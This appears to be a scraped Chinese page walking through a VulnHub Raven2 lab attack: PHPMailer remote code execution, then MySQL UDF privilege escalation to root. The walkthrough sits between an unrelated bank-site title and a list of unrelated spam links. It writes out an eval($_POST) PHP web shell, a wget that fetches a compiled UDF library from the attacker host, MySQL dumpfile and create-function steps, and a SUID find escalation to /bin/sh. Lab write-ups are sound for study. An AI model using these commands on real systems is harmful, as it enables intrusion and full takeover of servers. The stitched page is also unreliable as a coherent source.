当前位置: 首页 > news >正文

建设银行嘉兴分行官方网站支持wordpress的主机

建设银行嘉兴分行官方网站,支持wordpress的主机,中国食品网,app永久免费下载安装什么是UDF#xff1a; UDF(Userfined function)用户自定义函数#xff0c;是MySQL的一个扩展接口#xff0c;用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能#xff0c;其添加的新函数都可以在 SQL 语句中调用。 提权条件#xff1a; 知道MySQL用户名和密码…什么是UDF UDF(Userfined function)用户自定义函数是MySQL的一个扩展接口用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能其添加的新函数都可以在 SQL 语句中调用。 提权条件 知道MySQL用户名和密码可以登录MySQL有写入文件权限即 secure_file_priv 的值为空 注意使用 UDF 提权是在获取到 webshell 的前提下获取到的用户只是网络服务权限 www 或其他普通用户我们可以利用 mysql 的 UDF 提权获取到管理员权限。 如何使用UDF提权 MySQL版本 5.1版本udf.dlludf.so文件必须放置于MySQL安装目录下的 lib\plugin 文件夹下 MySQL版本 5.1版本udf.dll 文件放置于 c:\windows 或者 c:\system32 如果目录不存在则利用 NTFS 数据流创建文件目录 udf提权可以用于 windows 系统udf.dll也可以用于linux平台udf.so。但 udf 提权基本上用于 windows 系统linux系统中 mysql版本 5.1 udf.so 该放哪里网上查找也没有得到结果。 靶场复现 通过 vulnhub 下载靶场镜像 靶机地址https://download.vulnhub.com/raven/Raven2.ova 攻击机kali192.168.111.129靶机Raven2192.168.111.132 信息收集 nmap扫描端口开放情况 nmap 192.168.111.132 -sV -p- -Pn发现开放了228011158686端口操作系统为Linux。 访问80端口 dirsearch 扫描一下目录 发现靶机是 wordpress 可以用wpscan扫描有没有wordpress漏洞。 此外还发现另外一个目录/vendor目录访问目录发现存在信息泄露 通过 README.md 文件得知为 phpmailer百度 phpmailer 知道是一个php发送邮件的程序且版本小于 5.2.18 存在漏洞远程命令执行漏洞查看当前 version 版本为 5.2.16 phpmailer漏洞利用 使用 python 脚本复制脚本到桌面将 target 改为目标IP后面拼接 contact.php该文件应该是PHPMailer服务接口backdoor 为生成的后门文件payload 改为 kali 的 ip 和监听的端口email那把路径改为目标的网站根目录可以在 /vendor/PATH 中找到。 修改完成后执行。 python 40974.py 先开启 nc 监听接收shell然后浏览器访问生成的后门文件终端回显getshell成功。这里后门文件名应该有限制默认生成不了改为1.php后成功了 执行 whoami 发现为 www-date 权限 使用 python 执行交互式 shell python -c import pty;pty.spawn(/bin/bash)也可以写一句话用菜刀蚁剑连接方便操作 echo ?php eval($_POST[s]);? 2.php进入wordpress目录内查看wp的配置文件wp-config.php发现数据库用户名与密码。 账号 root密码 Rv3nSecurity 使用得到的用户名密码登录mysql mysql -uroot -pRv3nSecurity在user表中发现了其他用户名与密码但是加密的密码没有破解出来。所以换个思路尝试下UDF提权。 MySQL-UDF提权利用 首先查找漏洞并下载漏洞利用脚本1518.c searchsploit udfsearchsploit udf -m 1518.c下载 udf 提权脚本在 kali 使用 gcc 编译成 Linux 所需 udf 提权的so文件。 gcc -g -c 1518.cgcc -g -shared -o 1518.so 1518.o将编译后的1518.so上传到靶机 /tmp 目录内。 python3 -m http.server 8888 wget 192.168.111.129:8888/1518.so登录 mysql 切换数据库 wordpress 并创建新表 foo。 create table foo(line blob); #创建数据表insert into foo values(load_file(/tmp/1518.so)); #读取 1518.so 并将其保存在表foo中select * from foo into dumpfile /usr/lib/mysql/plugin/1518.so; #查询刚才添加的数据保存到/usr/lib/mysql/plugin/1518.so文件mysql存放自定义函数的地方create function do_system returns integer soname 1518.so; #加载 1518.so 函数文件用来创建自定义函数类型是integersoname 别名 select * from mysql.func; #查询函数是否创建成功select do_system(chmod us /usr/bin/find); #调用自定义函数do_system赋予find命令suid权限。select do_system(chmod us /usr/bin/find); #调用自定义函数do_system赋予find命令suid权限。准备工作完成后退出数据库使用find命令进行提权。 mysql quit ​ find / -exec /bin/sh \; #find /从根目录开始查找。 #-exec表示对找到的每个文件执行后面的命令。 #/bin/sh这是要执行的命令即启动一个新的 shell 实例。 #\;表示 -exec 命令的结束。根据结果可以看到提权成功
http://www.yayakq.cn/news/2502/

相关文章:

  • 专门做软陶的网站凡客诚品官网怎么登录
  • 杭州建站价格安徽省建设行业安全协会网站
  • 网站排名推广WordPress注册登录框
  • 酒店招聘做的好的网站电商设计属于什么专业
  • asp简单购物网站源码律师做推广宣传的网站
  • 懒人建站seo流量是什么意思
  • 响应式网站无法做联盟广告怎么注册公司需要多少钱
  • 小米公司网站前建设分析深圳东门地铁站叫什么
  • 石家庄网站建设远策科技dede静态网站
  • 东莞网站设计智能 乐云践新楼市政策最新消息
  • 绍兴 网站建设目前国内做情趣最好的网站
  • 管理信息系统与网站建设有什么区别网络广告是什么
  • 精品网站建设费用 找磐石网络一流北京网站建设 公司
  • 如何建立自己的网站商城有名做网站公司
  • 常州市中大建设工程有限公司网站开发一个平台
  • 做网站都需要学什么语言新闻中心网页设计
  • 做网站多少钱 优帮云微信公众平台注册公众号
  • php电子商务网站开发实例做空机构的网站
  • 网站推广的企业湖南网站建设工作室
  • 永久建站平台solidworks永久免费版
  • 建一个网站怎么赚钱福田庆三下巴
  • 网站外链单页购物网站源码
  • 北京市住房和城乡建设厅官方网站建筑图纸怎样识图
  • 怎么创建网站建设什么网站做电子元器件
  • 广州seo网站推广优化青少年编程培训哪家好
  • 房地产网站模板库国内crm系统
  • 怎样制作一个app软件网站关键词快速排名优化
  • 网站建设基础问题企业网站建设智恒网络
  • 天河低价网站建设哪里有零基础网站建设教学公司
  • 建设一个连接的网站个人网站有必要备案吗